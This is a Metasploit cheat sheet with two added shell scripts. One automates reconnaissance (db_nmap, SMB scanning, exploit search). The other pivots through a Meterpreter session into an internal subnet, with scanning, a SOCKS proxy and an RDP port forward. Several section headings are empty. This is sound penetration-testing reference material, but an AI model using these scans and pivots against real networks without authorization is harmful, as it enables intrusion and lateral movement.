Metasploit
General Info
Metasploit is a penetration testing framework maintained by Rapid7. It ships with exploit, auxiliary and post modules, a library of payloads, and its own in-memory post-exploitation agent and shell, Meterpreter.
Commands
These commands are adapted from the Metasploit Cheat Sheet created by TunnelsUp.
General
Using the database
The Metasploit database (PostgreSQL) stores what you collect during an engagement: hosts and services found by db_nmap and auxiliary scanners, loot, hashdumps and credentials. Check it with db_status before you start; if it reports "not connected", db_nmap and the hosts/services/creds commands will refuse to run, so initialise it first (msfdb init on Kali) and restart msfconsole. For separate assignments, keep the data apart with Workspaces (see below).
First Time Setup
Commands
Exploit handling
Finding an Exploit to use
First, gather information using db_nmap and auxiliary modules. Auxiliary modules include numerous scanners, gatherers, fuzzers and tools that take a CIDR block or a single IP in RHOSTS and save their results in the database.
Once information is gathered on the host, look at the results with hosts and services: what OS is running, which services and versions were found? Then use the search command (by keyword, or with filters such as type:exploit, platform:windows, cve:2017) to find suitable exploits, or auxiliary modules for further enumeration.
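The database and enumeration steps above, as an added example that is not part of the original cheat sheet: a shell function writes a Metasploit resource script for the "database first, then search" workflow and runs it with msfconsole -q -r when msfconsole is installed (otherwise it just prints the script). The workspace name, the target range and the output path are constructed values; the modules and commands in the script (db_status, workspace, db_nmap, services, auxiliary/scanner/smb/smb_version, search) are standard msfconsole commands.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: generate a Metasploit
# resource script (.rc) that runs the enumeration workflow and hand it to
# msfconsole. Workspace name, target and output path are constructed values.

write_recon_rc() {
    # $1 = workspace name, $2 = target (single IP or CIDR), $3 = output file
    ws=$1; target=$2; out=$3
    cat > "$out" <<EOF
# Fail early if the database is down: db_nmap and hosts/services need it.
db_status
# Keep this engagement's data separate from other assignments.
workspace -a $ws
# Version-scan the target; results land in hosts/services of this workspace.
db_nmap -Pn -sV $target
hosts
# Which hosts expose SMB? (-p filters the services table by port)
services -p 445
# Auxiliary scanners also write their findings to the database.
use auxiliary/scanner/smb/smb_version
set RHOSTS $target
set THREADS 10
run
# Turn the findings into candidate modules.
search type:exploit platform:windows smb
search type:auxiliary smb
EOF
}

run_rc() {
    # Run a resource script when msfconsole is available; otherwise show it.
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$1"
    else
        cat "$1"
    fi
}

rc_file="${TMPDIR:-/tmp}/recon.rc"
write_recon_rc "assignment1" "10.10.10.0/24" "$rc_file"   # constructed values
run_rc "$rc_file"
```

Lines starting with # are ignored by the resource-script loader, so the comments can stay in the file. The console stays open after the script finishes, which is usually what you want: look at hosts, services -p 445 and the search output, then pick and configure the module by hand.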
Executing an Exploit
Sessions
Meterpreter
General commands
Privilege Escalation
Windows Access Token Theft
Port forwarding / pivoting
Enable port forwarding from inside the Meterpreter session, opening port 3388 on the attacking machine and forwarding all traffic sent to it to port 3389 on the remote host (the forward only lives as long as the session does; -L is optional and binds the listener to a specific local address, and portfwd list shows the active forwards):
portfwd [add|delete] [-L <LHOST>] -l 3388 -p 3389 -r <RHOST>
Pivot through a session by adding a route within msfconsole; Metasploit modules then reach hosts on that subnet through the session, so you can scan or exploit adjacent hosts (verify with route print; tools outside msf do not see this route, so pair it with auxiliary/server/socks_proxy and proxychains for those):
route add <SUBNET> <MASK> <SESSIONID>
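The pivoting and port-forwarding commands above, as an added example that is not part of the original cheat sheet: a shell script builds a resource script that routes an internal subnet through an existing Meterpreter session, port-scans that subnet through the pivot, starts a SOCKS5 proxy so tools outside msf can use the route, and sets up the RDP port forward from msfconsole with sessions -C. The session id (1), the subnet (10.10.20.0/24) and the RDP host (10.10.20.5) are constructed values; a Meterpreter session with that id must already exist when the script is run. prefix_to_mask converts the CIDR prefix to the dotted mask that route add expects and rejects bad input, which is why it is worth having as a separate function.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: write a resource script
# that pivots through an existing Meterpreter session. Session id, subnet
# and hosts are constructed values; the modules used are standard msf ones.

prefix_to_mask() {
    # Convert a CIDR prefix length (0-32) to the dotted-decimal mask that
    # "route add <SUBNET> <MASK> <SESSIONID>" expects. Returns 1 on bad input.
    p=$1
    [ "$p" -ge 0 ] && [ "$p" -le 32 ] || return 1
    m=$(( (4294967295 << (32 - p)) & 4294967295 ))
    printf '%d.%d.%d.%d\n' \
        $(( (m >> 24) & 255 )) $(( (m >> 16) & 255 )) \
        $(( (m >> 8) & 255 ))  $(( m & 255 ))
}

write_pivot_rc() {
    # $1 = session id, $2 = internal subnet as CIDR, $3 = internal RDP host,
    # $4 = output file. Fails if $2 is not a valid CIDR.
    sid=$1; cidr=$2; rdp_host=$3; out=$4
    subnet=${cidr%/*}
    mask=$(prefix_to_mask "${cidr#*/}") || return 1
    cat > "$out" <<EOF
# Send msf traffic for the internal subnet through session $sid, then verify.
route add $subnet $mask $sid
route print
# Scan the adjacent hosts through the pivot (msf modules honour the route).
use auxiliary/scanner/portscan/tcp
set RHOSTS $cidr
set PORTS 22,80,139,445,3389
set THREADS 10
run
# Tools outside msf do not see the route: expose it as a SOCKS5 proxy on
# 127.0.0.1:1080 (add "socks5 127.0.0.1 1080" to proxychains.conf).
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 5
run -j
# Local 3388 -> $rdp_host:3389, set up from msfconsole via sessions -C;
# the forward lives only as long as the session does.
sessions -C "portfwd add -l 3388 -p 3389 -r $rdp_host" -i $sid
EOF
}

rc_file="${TMPDIR:-/tmp}/pivot.rc"
write_pivot_rc 1 10.10.20.0/24 10.10.20.5 "$rc_file"   # constructed values
if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$rc_file"
else
    cat "$rc_file"
fi
```

After the script has run, rdesktop or xfreerdp against 127.0.0.1:3388 reaches the internal host's RDP service, and proxychains nmap -sT against 10.10.20.0/24 goes through the SOCKS proxy and therefore through the session; remember that only TCP is carried over the pivot, so use connect scans, not SYN or UDP scans.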
Workspaces
Each workspace acts like a separate database. Need a fresh DB? Create a new workspace: workspace -a <name> creates it and switches to it, workspace <name> switches between existing ones, workspace lists them, and workspace -d <name> deletes one together with its hosts, services and credentials.